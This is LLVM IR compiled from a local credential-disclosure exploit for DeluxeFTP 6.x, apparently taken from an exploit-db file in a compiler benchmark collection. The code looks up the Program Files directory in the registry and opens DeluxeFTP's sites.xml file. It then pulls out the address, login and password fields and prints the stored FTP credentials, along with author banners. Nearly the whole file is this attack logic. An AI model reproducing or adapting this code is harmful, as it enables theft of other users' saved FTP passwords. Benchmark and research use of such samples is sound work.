; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_936.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_936.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@HKEY_LOCAL_MACHINE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [42 x i8] c"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\00", align 1
@KEY_QUERY_VALUE = common dso_local global i32 0, align 4
@hKey = common dso_local global i32 0, align 4
@ERROR_SUCCESS = common dso_local global i64 0, align 8
@.str.1 = private unnamed_addr constant [16 x i8] c"ProgramFilesDir\00", align 1
@prgfiles = common dso_local global i64 0, align 8
@dwBufLen = common dso_local global i64 0, align 8
@lRet = common dso_local global i64 0, align 8
@BUFSIZE = common dso_local global i64 0, align 8
@.str.2 = private unnamed_addr constant [19 x i8] c"An error occured!\0A\00", align 1
@.str.3 = private unnamed_addr constant [21 x i8] c"\\DeluxeFTP\\sites.xml\00", align 1
@.str.4 = private unnamed_addr constant [58 x i8] c"DeluxeFtp 6.x Local Password Disclosure Exploit by Kozan\0A\00", align 1
@.str.5 = private unnamed_addr constant [27 x i8] c"Bug Discovered by Lostmon\0A\00", align 1
@.str.6 = private unnamed_addr constant [24 x i8] c"Exploit coded by Kozan\0A\00", align 1
@.str.7 = private unnamed_addr constant [19 x i8] c"Credits to ATmaCA\0A\00", align 1
@.str.8 = private unnamed_addr constant [48 x i8] c"www.netmagister.com - www.spyinstructors.com \0A\0A\00", align 1
@.str.9 = private unnamed_addr constant [61 x i8] c"This exploit only shows the first profile and its password.\0A\00", align 1
@.str.10 = private unnamed_addr constant [31 x i8] c"You may improve it freely...\0A\0A\00", align 1
@.str.11 = private unnamed_addr constant [10 x i8] c"<ADDRESS>\00", align 1
@.str.12 = private unnamed_addr constant [8 x i8] c"<LOGIN>\00", align 1
@.str.13 = private unnamed_addr constant [11 x i8] c"<PASSWORD>\00", align 1
@.str.14 = private unnamed_addr constant [18 x i8] c"Ftp Address : %s\0A\00", align 1
@.str.15 = private unnamed_addr constant [19 x i8] c"Ftp Username : %s\0A\00", align 1
@.str.16 = private unnamed_addr constant [19 x i8] c"Ftp Password : %s\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i8*, align 8
  %3 = alloca i64, align 8
  %4 = alloca i64, align 8
  %5 = alloca i64, align 8
  store i32 0, i32* %1, align 4
  %6 = load i32, i32* @HKEY_LOCAL_MACHINE, align 4
  %7 = load i32, i32* @KEY_QUERY_VALUE, align 4
  %8 = call i64 @RegOpenKeyEx(i32 %6, i8* getelementptr inbounds ([42 x i8], [42 x i8]* @.str, i64 0, i64 0), i32 0, i32 %7, i32* @hKey)
  %9 = load i64, i64* @ERROR_SUCCESS, align 8
  %10 = icmp eq i64 %8, %9
  br i1 %10, label %11, label %31

11:                                               ; preds = %0
  %12 = load i32, i32* @hKey, align 4
  %13 = load i64, i64* @prgfiles, align 8
  %14 = trunc i64 %13 to i32
  %15 = call i64 @RegQueryValueEx(i32 %12, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.1, i64 0, i64 0), i32* null, i32* null, i32 %14, i64* @dwBufLen)
  store i64 %15, i64* @lRet, align 8
  %16 = load i64, i64* @lRet, align 8
  %17 = load i64, i64* @ERROR_SUCCESS, align 8
  %18 = icmp ne i64 %16, %17
  br i1 %18, label %23, label %19

19:                                               ; preds = %11
  %20 = load i64, i64* @dwBufLen, align 8
  %21 = load i64, i64* @BUFSIZE, align 8
  %22 = icmp sgt i64 %20, %21
  br i1 %22, label %23, label %28

23:                                               ; preds = %19, %11
  %24 = load i32, i32* @hKey, align 4
  %25 = call i32 @RegCloseKey(i32 %24)
  %26 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.2, i64 0, i64 0))
  %27 = call i32 @exit(i32 1) #4
  unreachable

28:                                               ; preds = %19
  %29 = load i32, i32* @hKey, align 4
  %30 = call i32 @RegCloseKey(i32 %29)
  br label %36

31:                                               ; preds = %0
  %32 = load i32, i32* @hKey, align 4
  %33 = call i32 @RegCloseKey(i32 %32)
  %34 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.2, i64 0, i64 0))
  %35 = call i32 @exit(i32 1) #4
  unreachable

36:                                               ; preds = %28
  %37 = load i64, i64* @prgfiles, align 8
  %38 = call i32 @strcat(i64 %37, i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.3, i64 0, i64 0))
  %39 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str.4, i64 0, i64 0))
  %40 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.5, i64 0, i64 0))
  %41 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.6, i64 0, i64 0))
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.7, i64 0, i64 0))
  %43 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([48 x i8], [48 x i8]* @.str.8, i64 0, i64 0))
  %44 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([61 x i8], [61 x i8]* @.str.9, i64 0, i64 0))
  %45 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.10, i64 0, i64 0))
  %46 = load i64, i64* @BUFSIZE, align 8
  %47 = call i8* @llvm.stacksave()
  store i8* %47, i8** %2, align 8
  %48 = alloca i8, i64 %46, align 16
  store i64 %46, i64* %3, align 8
  %49 = load i64, i64* @BUFSIZE, align 8
  %50 = alloca i8, i64 %49, align 16
  store i64 %49, i64* %4, align 8
  %51 = load i64, i64* @BUFSIZE, align 8
  %52 = alloca i8, i64 %51, align 16
  store i64 %51, i64* %5, align 8
  %53 = load i64, i64* @prgfiles, align 8
  %54 = call i32 @oku(i64 %53, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.11, i64 0, i64 0))
  %55 = call i32 @strcpy(i8* %48, i32 %54)
  %56 = load i64, i64* @prgfiles, align 8
  %57 = call i32 @oku(i64 %56, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.12, i64 0, i64 0))
  %58 = call i32 @strcpy(i8* %50, i32 %57)
  %59 = load i64, i64* @prgfiles, align 8
  %60 = call i32 @oku(i64 %59, i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.13, i64 0, i64 0))
  %61 = call i32 @strcpy(i8* %52, i32 %60)
  %62 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([18 x i8], [18 x i8]* @.str.14, i64 0, i64 0), i8* %48)
  %63 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.15, i64 0, i64 0), i8* %50)
  %64 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.16, i64 0, i64 0), i8* %52)
  store i32 0, i32* %1, align 4
  %65 = load i8*, i8** %2, align 8
  call void @llvm.stackrestore(i8* %65)
  %66 = load i32, i32* %1, align 4
  ret i32 %66
}

declare dso_local i64 @RegOpenKeyEx(i32, i8*, i32, i32, i32*) #1

declare dso_local i64 @RegQueryValueEx(i32, i8*, i32*, i32*, i32, i64*) #1

declare dso_local i32 @RegCloseKey(i32) #1

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @strcat(i64, i8*) #1

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #3

declare dso_local i32 @strcpy(i8*, i32) #1

declare dso_local i32 @oku(i64, i8*) #1

; Function Attrs: nounwind
declare void @llvm.stackrestore(i8*) #3


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
